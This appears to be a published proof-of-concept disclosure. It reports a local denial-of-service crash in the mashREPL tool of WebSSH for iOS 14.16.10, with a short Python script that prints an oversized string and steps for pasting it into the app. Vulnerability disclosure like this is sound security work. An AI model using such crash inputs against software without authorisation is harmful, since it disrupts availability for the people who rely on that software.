Authored by Luis Martinez

WebSSH for iOS version 14.16.10 suffers from a denial of service vulnerability.

# Exploit Title: WebSSH for iOS 14.16.10 - 'mashREPL' Denial of Service (PoC)
# Author: Luis Martinez
# Discovery Date: 2021-05-18
# Vendor Homepage:
# Software Link: App Store for iOS devices
# Tested Version: 14.16.10
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: iPhone 7 iOS 14.5.1

# Steps to Produce the Crash:
# 1.- Run python code:
# 2.- Copy content to clipboard
# 3.- Open "WebSSH for iOS"
# 4.- Click -> Tools
# 5.- Click -> mashREPL
# 6.- Paste ClipBoard on "mashREPL>"
# 7.- Intro
# 8.- Crashed

#!/usr/bin/env python

buffer = "x41" * 300
print (buffer)